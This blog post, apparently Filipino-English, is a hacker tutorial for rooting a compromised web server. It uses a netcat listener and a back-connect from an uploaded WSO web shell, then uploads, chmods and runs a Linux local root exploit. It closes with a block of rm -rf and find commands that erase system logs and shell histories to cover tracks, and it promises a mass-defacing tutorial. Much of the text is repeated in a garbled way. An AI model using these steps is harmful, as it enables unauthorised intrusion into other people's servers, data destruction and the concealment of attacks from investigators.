- NetcaT
- Shelled site
- Local root expl0it (LOCAL ROOT EXPLOITS 2006-2013 DOWNLOAD LINK WILL BE PROVIDED AT THE END OF THE TUTORIAL)
- Open port.. (port forwarding)(to open port, sa cmd type ipconfig /all then the default gateway.)
1. download nyo po netcat, den put it on desktop. or in any place that you like :D(in my case its in Desktop)
2. open netcat WITH CMD!!!! :v
>>>> cd Desktop/netcat >> enter
3. Now Type : nc -nlvp 443 , then it would show like the image shown below
(example the open port is 443)
(example the open port is 443)
.Its time to open your shell & then connect using back connect function in your shell ( Make sure that you are not using any Vpn or Proxy ) .
Then after the connection is established you will see something as shown in the screenshot below .
Then after the connection is established you will see something as shown in the screenshot below .
5. upload you exploit on the site :D
example.: youve uploaded 2.6.18-374 2011 on the public_html dir
6. if your using WSO shell, click network button,
then type your desired port, (mine is 443)
the Connect,, if you see this,, your sucessfuly backconnected ti the server
example.: youve uploaded 2.6.18-374 2011 on the public_html dir
6. if your using WSO shell, click network button,
then type your desired port, (mine is 443)
the Connect,, if you see this,, your sucessfuly backconnected ti the server
7. check the dir where you are,(pagpasensyaha ang grammer, correct my grammar :D )
>> tpype pwdsince you uploaded you exploit in public_html
>> type cd the the path for public_html
8. CHMOD THE EXPLOIT
>>type chmod 777 2.6.18-374 2011
9.Now its time to run the Exploit, to run the exploit we will type the following command
>>Type: ./2.6.18-374 2011 (the exploit name )
then to check if the site is rooted.type
>> id
>>whoami
THEN CHADA! ROOTED NA ANG SERVER :p
Clearing Logs:
Now its our time to clearing our tracks or Logs . so below are some commands to delete the log files .
rm -rf /tmp/logs rm -rf $HISTFILE rm -rf /root/.ksh_history rm -rf /root/.bash_history rm -rf /root/.ksh_history rm -rf /root/.bash_logout rm -rf /usr/local/apache/logs rm -rf /usr/local/apache/log rm -rf /var/apache/logs rm -rf /var/apache/log rm -rf /var/run/utmp rm -rf /var/logs rm -rf /var/log rm -rf /var/adm rm -rf /etc/wtmp rm -rf /etc/utmp history -c find / -name *.bash_history -exec rm -rf {} \; find / -name *.bash_logout -exec rm -rf {} \; find / -name "log*" -exec rm -rf {} \; find / -name *.log -exec rm -rf {} \;
NEXT TUTORIAL WILL BE ON MASS DEFACING :D STAY TUNED
>> tpype pwdsince you uploaded you exploit in public_html
>> type cd the the path for public_html
8. CHMOD THE EXPLOIT
>>type chmod 777 2.6.18-374 2011
9.Now its time to run the Exploit, to run the exploit we will type the following command
>>Type: ./2.6.18-374 2011 (the exploit name )
then to check if the site is rooted.type
>> id
>>whoami
THEN CHADA! ROOTED NA ANG SERVER :p
Clearing Logs:
Now its our time to clearing our tracks or Logs . so below are some commands to delete the log files .
rm -rf /tmp/logs rm -rf $HISTFILE rm -rf /root/.ksh_history rm -rf /root/.bash_history rm -rf /root/.ksh_history rm -rf /root/.bash_logout rm -rf /usr/local/apache/logs rm -rf /usr/local/apache/log rm -rf /var/apache/logs rm -rf /var/apache/log rm -rf /var/run/utmp rm -rf /var/logs rm -rf /var/log rm -rf /var/adm rm -rf /etc/wtmp rm -rf /etc/utmp history -c find / -name *.bash_history -exec rm -rf {} \; find / -name *.bash_logout -exec rm -rf {} \; find / -name "log*" -exec rm -rf {} \; find / -name *.log -exec rm -rf {} \;
NEXT TUTORIAL WILL BE ON MASS DEFACING :D STAY TUNED
0 blogger-facebook:
Post a Comment